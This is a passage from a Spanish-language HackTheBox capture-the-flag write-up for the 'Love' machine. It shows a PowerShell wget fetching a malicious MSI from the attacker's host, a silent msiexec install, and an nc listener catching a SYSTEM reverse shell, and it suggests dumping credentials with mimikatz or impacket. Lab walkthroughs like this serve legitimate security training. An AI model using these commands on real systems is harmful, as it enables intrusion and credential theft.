c:\Users\Phoebe\Documents>powershell wget http://10.10.14.9:5000/love.msi -outfile love.msi powershell wget http://10.10.14.9:5000/love.msi -outfile love.msi |
Y ejecutamos con msiexec
1 2 |
c:\Users\Phoebe\Documents>msiexec /quiet /qn /i love.msi msiexec /quiet /qn /i love.msi |
Y automáticamente tenemos una shell con system en nuestra escucha
1 2 3 4 5 6 7 8 9 |
$ nc -lvp 4445 listening on [any] 4445 ... connect to [10.10.14.9] from love.htb [10.10.10.239] 61024 Microsoft Windows [Version 10.0.19042.867] (c) 2020 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami whoami nt authority\system |
Obteniendo la flag de root
Ahora que ya somos system, vamos a obtener nuestra flag de root para completar la máquina.
1 2 3 4 |
C:\WINDOWS\system32> C:\WINDOWS\system32>type c:\users\administrator\desktop\root.txt type c:\users\administrator\desktop\root.txt bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx4 |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos. Como paso final quedaría hacer un dump de las claves ya sea con mimikatz, impacket o la herramienta que se prefiera.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace